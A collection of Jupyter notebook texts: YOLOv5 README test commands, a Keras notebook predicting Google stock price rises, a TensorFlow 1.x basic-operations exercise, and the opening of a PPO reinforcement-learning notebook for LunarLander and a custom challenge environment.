- **Google Colab and Kaggle** notebooks with free GPU: <a href="https://colab.research.google.com/github/ultralytics/yolov5/blob/master/tutorial.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> <a href="https://www.kaggle.com/ultralytics/yolov5"><img src="https://kaggle.com/static/images/open-in-kaggle.svg" alt="Open In Kaggle"></a>
- **Google Cloud** Deep Learning VM. See [GCP Quickstart Guide](https://github.com/ultralytics/yolov5/wiki/GCP-Quickstart)
- **Amazon** Deep Learning AMI. See [AWS Quickstart Guide](https://github.com/ultralytics/yolov5/wiki/AWS-Quickstart)
- **Docker Image**. See [Docker Quickstart Guide](https://github.com/ultralytics/yolov5/wiki/Docker-Quickstart) <a href="https://hub.docker.com/r/ultralytics/yolov5"><img src="https://img.shields.io/docker/pulls/ultralytics/yolov5?logo=docker" alt="Docker Pulls"></a>
# Status

If this badge is green, all [YOLOv5 GitHub Actions](https://github.com/ultralytics/yolov5/actions) Continuous Integration (CI) tests are currently passing. CI tests verify correct operation of YOLOv5 training ([train.py](https://github.com/ultralytics/yolov5/blob/master/train.py)), testing ([test.py](https://github.com/ultralytics/yolov5/blob/master/test.py)), inference ([detect.py](https://github.com/ultralytics/yolov5/blob/master/detect.py)) and export ([export.py](https://github.com/ultralytics/yolov5/blob/master/models/export.py)) on MacOS, Windows, and Ubuntu every 24 hours and on every commit.
# Appendix
Optional extras below. Unit tests validate repo functionality and should be run on any PRs submitted.
```
# Re-clone repo
%cd ..
%rm -rf yolov5 && git clone https://github.com/ultralytics/yolov5
%cd yolov5
# Reproduce
for x in 'yolov5s', 'yolov5m', 'yolov5l', 'yolov5x':
!python test.py --weights {x}.pt --data coco.yaml --img 640 --conf 0.25 --iou 0.45 # speed
!python test.py --weights {x}.pt --data coco.yaml --img 640 --conf 0.001 --iou 0.65 # mAP
# PyTorch Hub
import torch
# Model
model = torch.hub.load('ultralytics/yolov5', 'yolov5s')
# Images
dir = 'https://github.com/ultralytics/yolov5/raw/master/data/images/'
imgs = [dir + f for f in ('zidane.jpg', 'bus.jpg')] # batch of images
# Inference
results = model(imgs)
results.print() # or .show(), .save()
# Unit tests
%%shell
export PYTHONPATH="$PWD" # to run *.py files in subdirectories
rm -rf runs # remove runs/
for m in yolov5s; do # models
python train.py --weights $m.pt --epochs 3 --img 320 --device 0 # train pretrained
python train.py --weights '' --cfg $m.yaml --epochs 3 --img 320 --device 0 # train scratch
for d in 0 cpu; do # devices
python detect.py --weights $m.pt --device $d # detect official
python detect.py --weights runs/train/exp/weights/best.pt --device $d # detect custom
python test.py --weights $m.pt --device $d # test official
python test.py --weights runs/train/exp/weights/best.pt --device $d # test custom
done
python hubconf.py # hub
python models/yolo.py --cfg $m.yaml # inspect
python models/export.py --weights $m.pt --img 640 --batch 1 # export
done
# Profile
from utils.torch_utils import profile
m1 = lambda x: x * torch.sigmoid(x)
m2 = torch.nn.SiLU()
profile(x=torch.randn(16, 3, 640, 640), ops=[m1, m2], n=100)
# Evolve
!python train.py --img 640 --batch 64 --epochs 100 --data coco128.yaml --weights yolov5s.pt --cache --noautoanchor --evolve
!d=runs/train/evolve && cp evolve.* $d && zip -r evolve.zip $d && gsutil mv evolve.zip gs://bucket # upload results (optional)
# VOC
for b, m in zip([64, 48, 32, 16], ['yolov5s', 'yolov5m', 'yolov5l', 'yolov5x']): # zip(batch_size, model)
!python train.py --batch {b} --weights {m}.pt --data voc.yaml --epochs 50 --cache --img 512 --nosave --hyp hyp.finetune.yaml --project VOC --name {m}
```
```
# TO DO: Pull from API
# Library Imports
import datetime
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import random
import tensorflow
import warnings
from keras import optimizers
from keras.layers import Dense, Dropout, Activation
from keras.models import Sequential
from keras.models import load_model
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.preprocessing import StandardScaler
warnings.filterwarnings('ignore')
# Import the dataset
dataset = pd.read_csv('data/GOOG.csv')
dataset = dataset[['Open', 'High', 'Low', 'Close']]
# Feature Engineering
dataset['H-L'] = dataset['High'] - dataset['Low']
dataset['O-C'] = dataset['Close'] - dataset['Open']
dataset['3day MA'] = dataset['Close'].shift(1).rolling(window = 3).mean()
dataset['10day MA'] = dataset['Close'].shift(1).rolling(window = 10).mean()
dataset['30day MA'] = dataset['Close'].shift(1).rolling(window = 30).mean()
dataset['Std_dev']= dataset['Close'].rolling(5).std()
'''
Identify price rises: a binary variable equal to 1 when the next day's
closing price is greater than the current day's closing price, and 0 otherwise.
'''
dataset['Price_Rise'] = np.where(dataset['Close'].shift(-1) > dataset['Close'], 1, 0)
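# (Added sketch, not in the original notebook.) Quick check of the labeling
# rule on a toy price series: 1 when the next day's close is higher, and 0
# for the final row, which has no next day to compare against.
import numpy as np
import pandas as pd
_toy_close = pd.Series([10.0, 11.0, 10.5, 12.0])
_toy_rise = np.where(_toy_close.shift(-1) > _toy_close, 1, 0)
assert list(_toy_rise) == [1, 0, 1, 0]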
# Drop NAN values
dataset = dataset.dropna()
dataset.head()
# Separate the target variable and drop it from the feature df
df = dataset.drop('Price_Rise', axis=1)
y = dataset['Price_Rise']
# Split the Dataset
X_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.20,
random_state=42)
'''
Establish a Baseline & Domain Insight:
Objective: beat a baseline accuracy of 51.7%.
Why such a low baseline? Casinos make their money on 51%/49% odds, so any
accuracy better than 51% should be considered a success.
'''
y_train.value_counts(normalize=True)
'''
Feature Scaling and Standardizing:
This ensures that no feature dominates training simply because it is measured
on a larger scale. Without it, the network would tend to assign larger weights
to features with larger average magnitudes, biasing the fit.
'''
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
'''
NN Notes:
Units: This defines the number of nodes or neurons in that particular layer.
We have set this value to 128, meaning there will be 128 neurons in our hidden layer.
Kernel_initializer: This defines the starting values for the weights of the
different neurons in the hidden layer. We have defined this to be ‘uniform’,
which means that the weights will be initialized with values from a uniform distribution.
Activation: This is the activation function for the neurons in the particular hidden layer.
Here we define the function as the Rectified Linear Unit, or ‘relu’.
Inputs: This defines the number of inputs to the hidden layer, we have defined this
value to be equal to the number of columns of our input feature dataframe.
This argument will not be required in the subsequent layers, as the model will know
how many outputs the previous layer produced.
'''
'''
Variables for NN - Adjust as necessary.
'''
epochs = 100
batch_size = 10
inputs = X_train.shape[1]
'''
A breakdown of the NN Architecture
'''
model = Sequential()
# Two Hidden Layers
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
# Output Layer
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
# Compile the Model
model.compile(optimizer='adam',
loss='mean_squared_error',
metrics=['acc'])
'''
Builds a function for our model, incorporates tensorboard for visual analysis
'''
def create_model():
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer='adam',
loss='mean_squared_error',
metrics=['acc'])
return model
# Fit and Train Model
model.fit(X_train, y_train,
batch_size = batch_size,
epochs = epochs)
# hyperparameter tuning
def create_model():
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer='adam',
loss='mean_squared_error',
metrics=['acc'])
return model
# prep for grid search
clf = KerasClassifier(build_fn=create_model, verbose=0)
# define Grid Search params
param_grid = {'batch_size': [20, 60, 80, 100, 200],
'epochs': [20]}
grid = GridSearchCV(estimator=clf,
param_grid=param_grid,
n_jobs=1)
grid_result = grid.fit(X_train, y_train)
# report results
print(f"Best: {grid_result.best_score_} using {grid_result.best_params_}")
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print(f"Means: {mean}, Stdev: {stdev} with: {param}")
# tune optimizer
from tensorflow.keras import optimizers
def create_model(learn_rate=0.001):
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer=optimizers.Adam(lr=learn_rate),
loss='mean_squared_error',
metrics=['acc'])
return model
# prepare for grid search
clf = KerasClassifier(build_fn=create_model, verbose=0)
# optimize with optimizer
param_grid = {'batch_size': [20],
'epochs': [20],
'learn_rate': [0.001, 0.01, 0.1, 0.2, 0.3, 0.5]}
grid = GridSearchCV(estimator=clf,
param_grid=param_grid,
n_jobs=1)
grid_result = grid.fit(X_train, y_train)
# report results
print(f"Best: {grid_result.best_score_} using {grid_result.best_params_}")
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print(f"Means: {mean}, Stdev: {stdev} with: {param}")
# tune epochs and save final model for future use
def create_model():
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer=optimizers.Adam(lr=0.01),
loss='mean_squared_error',
metrics=['acc'])
return model
# prepare for grid search
clf = KerasClassifier(build_fn=create_model, verbose=0)
# define grid search params
param_grid = {'batch_size': [20],
'epochs': [50, 100, 200, 500]}
grid = GridSearchCV(estimator=clf,
param_grid=param_grid,
n_jobs=1)
grid_result = grid.fit(X_train, y_train)
# Report Results
print(f"Best: {grid_result.best_score_} using {grid_result.best_params_}")
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print(f"Means: {mean}, Stdev: {stdev} with: {param}")
# fit final model and evaluate results
model.fit(X_train, y_train,
batch_size=20,
epochs=500)
# Save final model for future use
model.save('./models/goog_model.h5')
'''
Predict the Movement of Stock:
Now that the neural network has been trained, use the predict() method to make predictions.
Pass X_test as its argument and store the result in a variable named y_pred.
Then convert y_pred to binary values using the condition y_pred > 0.5, so that
y_pred stores True or False depending on whether the predicted probability
was greater or less than 0.5.
'''
y_pred = model.predict(X_test)
y_pred = (y_pred > 0.5)
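# (Added sketch, not part of the original notebook.) Sanity-check the
# 0.5-thresholding rule on synthetic probabilities before applying it to
# model.predict output; assumes scikit-learn is available.
import numpy as np
from sklearn.metrics import accuracy_score
_probs = np.array([[0.9], [0.2], [0.7], [0.4]])  # stand-in for model.predict(X_test)
_preds = (_probs > 0.5).ravel()                  # same rule as y_pred above
_truth = np.array([1, 0, 1, 1])
print('sketch accuracy: {:.2f}'.format(accuracy_score(_truth, _preds)))  # 0.75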
'''
Next, create a new column in the dataframe dataset with the column header 'y_pred'
and fill it with NaN values.
Then store the values of y_pred in this new column, starting from the rows of the test dataset.
This is done by slicing the dataframe using the iloc method as shown in the code below.
Finally, drop all rows containing NaN and store the result in a new dataframe named trade_dataset.
'''
dataset['y_pred'] = np.NaN
dataset.iloc[(len(dataset) - len(y_pred)):,-1:] = y_pred
trade_dataset = dataset.dropna()
# Computing Strategy Returns
trade_dataset['Tomorrows Returns'] = 0.
trade_dataset['Tomorrows Returns'] = np.log(trade_dataset['Close']/trade_dataset['Close'].shift(1))
trade_dataset['Tomorrows Returns'] = trade_dataset['Tomorrows Returns'].shift(-1)
trade_dataset['Strategy Returns'] = 0.
trade_dataset['Strategy Returns'] = np.where(trade_dataset['y_pred'] == True, trade_dataset['Tomorrows Returns'], - trade_dataset['Tomorrows Returns'])
trade_dataset['Cumulative Market Returns'] = np.cumsum(trade_dataset['Tomorrows Returns'])
trade_dataset['Cumulative Strategy Returns'] = np.cumsum(trade_dataset['Strategy Returns'])
# Graph the Results
plt.figure(figsize=(10,5))
plt.plot(trade_dataset['Cumulative Market Returns'], color='r', label='Market Returns')
plt.plot(trade_dataset['Cumulative Strategy Returns'], color='g', label='Strategy Returns')
plt.legend()
plt.show()
# Consider: Gather more data points (+100,000) for a more accurate model
```

# <center> "Hello World" in TensorFlow - Exercise Notebook</center>
#### Before everything, let's import the TensorFlow library
```
%matplotlib inline
import tensorflow as tf
```
### First, try to add the two constants and print the result.
```
a = tf.constant([5])
b = tf.constant([2])
```
Create another TensorFlow object applying the sum (+) operation:
```
#Your code goes here
c = tf.add(a,b)
```
<div align="right">
<a href="#sum1" class="btn btn-default" data-toggle="collapse">Click here for the solution #1</a>
<a href="#sum2" class="btn btn-default" data-toggle="collapse">Click here for the solution #2</a>
</div>
<div id="sum1" class="collapse">
```
c=a+b
```
</div>
<div id="sum2" class="collapse">
```
c=tf.add(a,b)
```
</div>
```
with tf.Session() as session:
result = session.run(c)
    print("The addition of these two constants is: {0}".format(result))
```
---
### Now let's try to multiply them.
```
# Your code goes here. Use the multiplication operator.
c = tf.multiply(a,b)
```
<div align="right">
<a href="#mult1" class="btn btn-default" data-toggle="collapse">Click here for the solution #1</a>
<a href="#mult2" class="btn btn-default" data-toggle="collapse">Click here for the solution #2</a>
</div>
<div id="mult1" class="collapse">
```
c=a*b
```
</div>
<div id="mult2" class="collapse">
```
c=tf.multiply(a,b)
```
</div>
```
with tf.Session() as session:
result = session.run(c)
    print("The multiplication of these two constants is: {0}".format(result))
```
### Multiplication: element-wise or matrix multiplication
Let's practice the different ways to multiply matrices:
- **Element-wise** multiplication in the **first operation**;
- **Matrix multiplication** in the **second operation**.
```
matrixA = tf.constant([[2,3],[3,4]])
matrixB = tf.constant([[2,3],[3,4]])
# Your code goes here
first_operation = tf.multiply(matrixA, matrixB)
second_operation=tf.matmul(matrixA,matrixB)
```
<div align="right">
<a href="#matmul1" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="matmul1" class="collapse">
```
first_operation=tf.multiply(matrixA, matrixB)
second_operation=tf.matmul(matrixA,matrixB)
```
</div>
```
with tf.Session() as session:
result = session.run(first_operation)
    print("Element-wise multiplication: \n", result)
    result = session.run(second_operation)
    print("Matrix multiplication: \n", result)
```
---
### Modify the value of variable b to the value in constant a:
```
a=tf.constant(1000)
b=tf.Variable(0)
init_op = tf.global_variables_initializer()
# Your code goes here
update = tf.assign(b,a)
with tf.Session() as session:
session.run(init_op)
session.run(update)
print(session.run(b))
```
<div align="right">
<a href="#assign" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="assign" class="collapse">
```
a=tf.constant(1000)
b=tf.Variable(0)
init_op = tf.global_variables_initializer()
update = tf.assign(b,a)
with tf.Session() as session:
session.run(init_op)
session.run(update)
print(session.run(b))
```
</div>
---
### Fibonacci sequence
Now try something more advanced: create a __Fibonacci sequence__ and print the first few values using TensorFlow.
The Fibonacci sequence is defined by the recurrence: <br><br>
$$F_{n} = F_{n-1} + F_{n-2}$$<br>
resulting in the sequence: 1, 1, 2, 3, 5, 8, 13, 21...
```
a=tf.Variable(0)
b=tf.Variable(1)
temp=tf.Variable(0)
c=a+b
update1=tf.assign(temp,c)
update2=tf.assign(a,b)
update3=tf.assign(b,temp)
init_op = tf.global_variables_initializer()
with tf.Session() as s:
s.run(init_op)
for _ in range(15):
print(s.run(a))
s.run(update1)
s.run(update2)
s.run(update3)
```
<div align="right">
<a href="#fibonacci-solution" class="btn btn-default" data-toggle="collapse">Click here for the solution #1</a>
<a href="#fibonacci-solution2" class="btn btn-default" data-toggle="collapse">Click here for the solution #2</a>
</div>
<div id="fibonacci-solution" class="collapse">
```
a=tf.Variable(0)
b=tf.Variable(1)
temp=tf.Variable(0)
c=a+b
update1=tf.assign(temp,c)
update2=tf.assign(a,b)
update3=tf.assign(b,temp)
init_op = tf.global_variables_initializer()
with tf.Session() as s:
s.run(init_op)
for _ in range(15):
print(s.run(a))
s.run(update1)
s.run(update2)
s.run(update3)
```
</div>
<div id="fibonacci-solution2" class="collapse">
```
f = [tf.constant(1),tf.constant(1)]
for i in range(2,10):
temp = f[i-1] + f[i-2]
f.append(temp)
with tf.Session() as sess:
result = sess.run(f)
    print(result)
```
</div>
---
### Now try to create your own placeholders and define any kind of operation between them:
```
# Your code goes here
a=tf.placeholder(tf.float32)
b=tf.placeholder(tf.float32)
c=2*a -b
dictionary = {a:[2,2],b:[3,4]}
with tf.Session() as session:
    print(session.run(c, feed_dict=dictionary))
```
<div align="right">
<a href="#placeholder" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="placeholder" class="collapse">
```
a=tf.placeholder(tf.float32)
b=tf.placeholder(tf.float32)
c=2*a -b
dictionary = {a:[2,2],b:[3,4]}
with tf.Session() as session:
    print(session.run(c, feed_dict=dictionary))
```
</div>
### Try changing our example with some other operations and see the result.
<div class="alert alert-info alertinfo">
<font size = 3><strong>Some examples of functions:</strong></font>
<br>
tf.multiply(x, y)<br />
tf.div(x, y)<br />
tf.square(x)<br />
tf.sqrt(x)<br />
tf.pow(x, y)<br />
tf.exp(x)<br />
tf.log(x)<br />
tf.cos(x)<br />
tf.sin(x)<br /> <br>
You can also take a look at [more operations]( https://www.tensorflow.org/versions/r0.9/api_docs/python/math_ops.html)
</div>
```
a = tf.constant(5.)
b = tf.constant(2.)
```
Create a variable named **`c`** to receive the result of an operation (of your choice):
```
#your code goes here
c=tf.sin(a)
```
<div align="right">
<a href="#operations" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="operations" class="collapse">
```
c=tf.sin(a)
```
</div>
```
with tf.Session() as session:
result = session.run(c)
    print("c = {}".format(result))
```
They're really similar to mathematical functions; the only difference is that these operations work over tensors.
## Want to learn more?
Running deep learning programs usually needs a high performance platform. PowerAI speeds up deep learning and AI. Built on IBM's Power Systems, PowerAI is a scalable software platform that accelerates deep learning and AI with blazing performance for individual users or enterprises. The PowerAI platform supports popular machine learning libraries and dependencies including Tensorflow, Caffe, Torch, and Theano. You can download a [free version of PowerAI](https://cocl.us/ML0120EN_PAI).
Also, you can use Data Science Experience to run these notebooks faster with bigger datasets. Data Science Experience is IBM's leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, DSX enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of DSX users today with a free account at [Data Science Experience](https://cocl.us/ML0120EN_DSX).

This is the end of this lesson. Hopefully, you now have a deeper and more intuitive understanding of TensorFlow's basic operations. Thank you for reading this notebook, and good luck with your studies.
### Thanks for completing this lesson!
| github_jupyter |
# LunarLander-v2
##Source
https://github.com/nikhilbarhate99/PPO-PyTorch/blob/master/PPO_continuous.py
(and the discrete: https://github.com/nikhilbarhate99/PPO-PyTorch/blob/master/PPO.py )
[source spec](https://github.com/nikhilbarhate99/PPO-PyTorch):
Python 3.6
PyTorch 1.0
NumPy 1.15.3
gym 0.10.8
Pillow 5.3.0
##Description of the discrete problem
https://github.com/openai/gym/wiki/Leaderboard#lunarlander-v2
•Landing pad is always at coordinates (0,0).
•Coordinates are the first two numbers in state vector.
•Reward for moving from the top of the screen to landing pad and zero speed is about 100..140 points. If lander moves away from landing pad it loses reward back.
•Episode finishes if the lander crashes or comes to rest, receiving additional -100 or +100 points. Each leg ground contact is +10. Firing main engine is -0.3 points each frame. Solved is 200 points. Landing outside landing pad is possible. Fuel is infinite, so an agent can learn to fly and then land on its first attempt.
Four discrete actions available: do nothing, fire left orientation engine, fire main engine, fire right orientation engine.
LunarLander-v2 defines "solving" as getting average reward of 200 over 100 consecutive trials
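That "solved" criterion is a rolling average; a small helper to check it during training could look like this (a sketch — the function name and signature are my own, not part of gym):

```python
import numpy as np

def is_solved(episode_rewards, target=200.0, window=100):
    """Return True once the mean reward over the last `window` episodes reaches `target`."""
    if len(episode_rewards) < window:
        return False
    return float(np.mean(episode_rewards[-window:])) >= target

print(is_solved([210.0] * 100))  # → True
print(is_solved([150.0] * 100))  # → False
```

This can be called once per episode on the running list of episode returns.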
##Description of the continuous problem
https://github.com/openai/gym/wiki/Leaderboard#lunarlandercontinuous-v2
•Landing pad is always at coordinates (0,0).
Coordinates are the first two numbers in state vector. Reward for moving from the top of the screen to landing pad and zero speed is about 100..140 points.
If lander moves away from landing pad it loses reward back.
Episode finishes if the lander crashes or comes to rest, receiving additional -100 or +100 points. Each leg ground contact is +10. Firing main engine is -0.3 points each frame. Solved is 200 points. Landing outside landing pad is possible. Fuel is infinite, so an agent can learn to fly and then land on its first attempt.
•Action is a vector of two real values from -1 to +1. The first controls the main engine: -1..0 off, 0..+1 throttle from 50% to 100% power. **The engine can't work with less than 50% power (I hope the author didn't implement something like that).**
• Second value -1.0..-0.5 fire left engine, +0.5..+1.0 fire right engine, -0.5..0.5 off.
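That mapping from the two-value action vector to engine commands can be sketched in plain Python (the function and its return format are my own, for illustration only — gym does this decoding internally):

```python
def decode_action(action):
    """Interpret a LunarLanderContinuous-v2 action vector [main, lateral] in [-1, 1]."""
    main, lateral = action
    # main engine: off below 0, otherwise throttle scales from 50% to 100% power
    main_power = 0.0 if main < 0.0 else 0.5 + 0.5 * main
    # lateral value: left engine in [-1, -0.5], right engine in [0.5, 1], otherwise off
    if lateral <= -0.5:
        side = 'left'
    elif lateral >= 0.5:
        side = 'right'
    else:
        side = 'off'
    return main_power, side

print(decode_action([1.0, 0.0]))   # → (1.0, 'off')
print(decode_action([-1.0, 0.7]))  # → (0.0, 'right')
```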
#Code
```
import os
try:
import torch
import torch.nn as nn
from torch.distributions import MultivariateNormal
import gym
import numpy as np
from netsapi.challenge import *
except:
!pip3 install git+https://github.com/slremy/netsapi --user --upgrade
!pip install box2d-py
print("restart the kernel and go")
os._exit(0)
# for the KDD-env
from sys import exit, exc_info, argv
from multiprocessing import Pool, current_process
import random as rand
import json
import requests
import numpy as np
import pandas as pd
import statistics
from IPython.display import clear_output
from contextlib import contextmanager
import sys, os
@contextmanager
def suppress_stdout():
with open(os.devnull, "w") as devnull:
old_stdout = sys.stdout
sys.stdout = devnull
try:
yield
finally:
sys.stdout = old_stdout
print("import successful")
import tensorflow as tf
import math
import matplotlib.pyplot as plt
device = "cpu"#torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
def clear_memory(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
```
###nn.Linear https://pytorch.org/docs/stable/_modules/torch/nn/modules/linear.html
Args:
in_features: size of each input sample
out_features: size of each output sample
bias: If set to ``False``, the layer will not learn an additive bias. Default: ``True``
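A minimal usage sketch of `nn.Linear` (the shapes are chosen arbitrarily for illustration):

```python
import torch
import torch.nn as nn

layer = nn.Linear(in_features=8, out_features=4)  # learns an 8 -> 4 affine map
x = torch.randn(2, 8)  # batch of 2 samples, 8 features each
y = layer(x)
print(y.shape)  # → torch.Size([2, 4])
```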
### torch.distributions.multivariate_normal.MultivariateNormal
https://pytorch.org/docs/stable/distributions.html#multivariatenormal
Parameters
loc (Tensor) – mean of the distribution
covariance_matrix (Tensor) – positive-definite covariance matrix
precision_matrix (Tensor) – positive-definite precision matrix
scale_tril (Tensor) – lower-triangular factor of covariance, with positive-valued diagonal
Ex
m = MultivariateNormal(torch.zeros(2), torch.eye(2))
m.sample() # normally distributed with mean=`[0,0]` and covariance_matrix=`I`
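A runnable version of that example, also showing `log_prob`, which the PPO code below relies on:

```python
import torch
from torch.distributions import MultivariateNormal

m = MultivariateNormal(torch.zeros(2), torch.eye(2))  # mean [0, 0], covariance I
sample = m.sample()        # a 2-dim normally distributed draw
logp = m.log_prob(sample)  # scalar log-density of that draw
print(sample.shape, logp.shape)
```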
```
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim, n_var, action_std):
super(ActorCritic, self).__init__()
# action mean range -1 to 1 #TODO how to change this to [0,1]
self.actor = nn.Sequential(
nn.Linear(state_dim, n_var),
nn.Tanh(),
nn.Linear(n_var, n_var),
nn.Tanh(),
nn.Linear(n_var, action_dim),
nn.Tanh()#todo change this to have something in the [0, 1] interval ***************
)
# critic
        self.critic = nn.Sequential( #TODO consider removing this since we already have a well-defined reward
nn.Linear(state_dim, n_var),
nn.Tanh(),
nn.Linear(n_var, n_var),
nn.Tanh(),
nn.Linear(n_var, 1)
)
self.action_var = torch.full((action_dim,), action_std*action_std).to(device) # define the variance of the action taken (gaussian model)
self.action_upper_bound = 1.0 #kim
self.action_lower_bound = 0.0 #kim
def forward(self):
raise NotImplementedError
def act(self, state, memory):
#print("act::state ",state)
type(state)
action_mean = self.actor(state)
#print("action_mean: ", action_mean)
dist = MultivariateNormal(action_mean, torch.diag(self.action_var).to(device)) # Gaussian distrib used by default by PPO
# To get a bounded action space we use Beta distrib:
# beta(4,4) approximate the gaussian well but still need to work on it ++ https://stats.stackexchange.com/questions/317729/is-the-gaussian-distribution-a-specific-case-of-the-beta-distribution
#dist = Beta(torch.tensor([4.0,4.0]), torch.tensor([4.0,4.0])) # https://pytorch.org/docs/stable/distributions.html#beta
# todo transform action_mean, torch.diag(self.action_var).to(device) --> beta param
action = dist.sample()
#print(action)
action = action.tolist()
action = [ (math.tanh(action[0])+1.0)/2.0 , (math.tanh(action[1])+1.0)/2.0 ] #https://pytorch.org/docs/stable/nn.html#tanh
#print(action)
#action+=1
#print(action)
#action/=2.0
#print(action)
action = torch.tensor(action)#this is making me use cpu and not gpu
#print(action)
action_logprob = dist.log_prob(action)
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(action_logprob)
# ++ how to limit my action space to https://github.com/openai/baselines/issues/121
# kim: i will implement this simple sol and hope it works: https://github.com/openai/baselines/issues/121#issuecomment-369688616
# action = np.clip(action, self.action_space.low, self.action_space.high)
# well since it s not a toch obj i will skip this sol XD --> let's use beta distrib (up)
# --> i don t know how to integrate the param of action_mean and action_var into the beta distrib --> go back to upper bound limit
#todo use a wrapper func for this thing ++ https://hub.packtpub.com/openai-gym-environments-wrappers-and-monitors-tutorial/
#action = torch.clamp(action, self.action_lower_bound, self.action_upper_bound, out=None) # https://pytorch.org/docs/master/torch.html?#torch.clamp
#we get a lot of 0 and 1 even if it a good thing but it will not learn in an efficient way since 0 was the mean and we trucate in 0 XD
return action.detach()
def evaluate(self, state, action):
action_mean = self.actor(state)
dist = MultivariateNormal(torch.squeeze(action_mean), torch.diag(self.action_var))
action_logprobs = dist.log_prob(torch.squeeze(action))
dist_entropy = dist.entropy()
state_value = self.critic(state)
return action_logprobs, torch.squeeze(state_value), dist_entropy
class PPO:
def __init__(self, state_dim, action_dim, n_latent_var, action_std, lr, betas, gamma, K_epochs, eps_clip):
self.lr = lr
self.betas = betas
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.policy = ActorCritic(state_dim, action_dim, n_latent_var, action_std).to(device)
self.optimizer = torch.optim.Adam(self.policy.parameters(),
lr=lr, betas=betas)
self.policy_old = ActorCritic(state_dim, action_dim, n_latent_var, action_std).to(device)
self.MseLoss = nn.MSELoss()
def select_action(self, state, memory):
#print("select_action::state ", state)
# state will not be reshaped (1, -1) since we have only one state -.-
state = torch.FloatTensor(state).to(device) # todo probably have to change it to int
#print("select_action:::state ", state)
return self.policy_old.act(state, memory).cpu().data.numpy().flatten()
def update(self, memory):
# Monte Carlo estimate of rewards:
rewards = []
discounted_reward = 0
for reward in reversed(memory.rewards):
discounted_reward = reward + (self.gamma * discounted_reward)
rewards.insert(0, discounted_reward)
# Normalizing the rewards:
rewards = torch.tensor(rewards).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)
# convert list to tensor
old_states = torch.stack(memory.states).to(device).detach()
old_actions = torch.stack(memory.actions).to(device).detach()
old_logprobs = torch.squeeze(torch.stack(memory.logprobs)).to(device).detach()
# Optimize policy for K epochs:
for _ in range(self.K_epochs):
# Evaluating old actions and values :
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions)
# Finding the ratio (pi_theta / pi_theta__old):
ratios = torch.exp(logprobs - old_logprobs.detach())
# Finding Surrogate Loss:
advantages = rewards - state_values.detach()
surr1 = ratios * advantages
surr2 = torch.clamp(ratios, 1-self.eps_clip, 1+self.eps_clip) * advantages
loss = -torch.min(surr1, surr2) + 0.5*self.MseLoss(state_values, rewards) - 0.01*dist_entropy
# take gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
# Copy new weights into old policy:
self.policy_old.load_state_dict(self.policy.state_dict())
#creating env of KDD (extending gym) https://www.novatec-gmbh.de/en/blog/creating-a-gym-environment/
from gym import error, spaces, utils
from gym.utils import seeding
class KddEnv(gym.Env):
state_dim = 1 # we have only one space dim
action_dim = 2
#metadata = {'render.modes': ['human']}
allRewards = []
def __init__(self):
print("--> init")
self.envSeqDec = ChallengeSeqDecEnvironment() #Initialise a New Challenge Environment to post entire policy
    def step(self, action): # one action, not the whole episode
type(action)
type(action.squeeze().tolist() )
s,r,d,_ = self.envSeqDec.evaluateAction(action.squeeze().tolist())
print("--> action: ",action," s,r,d,_", s," ",r," ",d)
self.allRewards.append(r)
return [s],r,d,_
def reset(self):
print("--> reset")
#self.envSeqDec.reset()
self.envSeqDec = ChallengeSeqDecEnvironment()
return [1]
def render(self, mode='human', close=False):
if len(self.allRewards) % 50 == 5 :
plt.plot(self.allRewards)
#plt.xlim((0,120))
plt.ylim((-100,150))
plt.show()
concat = np.add.reduceat(self.allRewards, np.arange(0, len(self.allRewards), 5))
print(np.max(concat))
def main():
############## Hyperparameters ##############
env_name = "KDD-v2" #"LunarLanderContinuous-v2"
    render = True # just to visualize the model (gym)
solved_reward = 200 #200 # stop training if avg_reward > solved_reward
log_interval = 5 #20 # print avg reward in the interval
max_episodes = 2000#20 #50000# max training episodes
max_timesteps = 5 #300 # max timesteps in one episode
